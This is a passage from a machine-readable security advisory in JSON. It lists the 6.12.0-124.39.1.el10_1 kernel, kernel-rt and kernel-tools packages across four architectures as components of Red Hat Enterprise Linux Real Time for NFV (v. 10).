"product_id": "NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
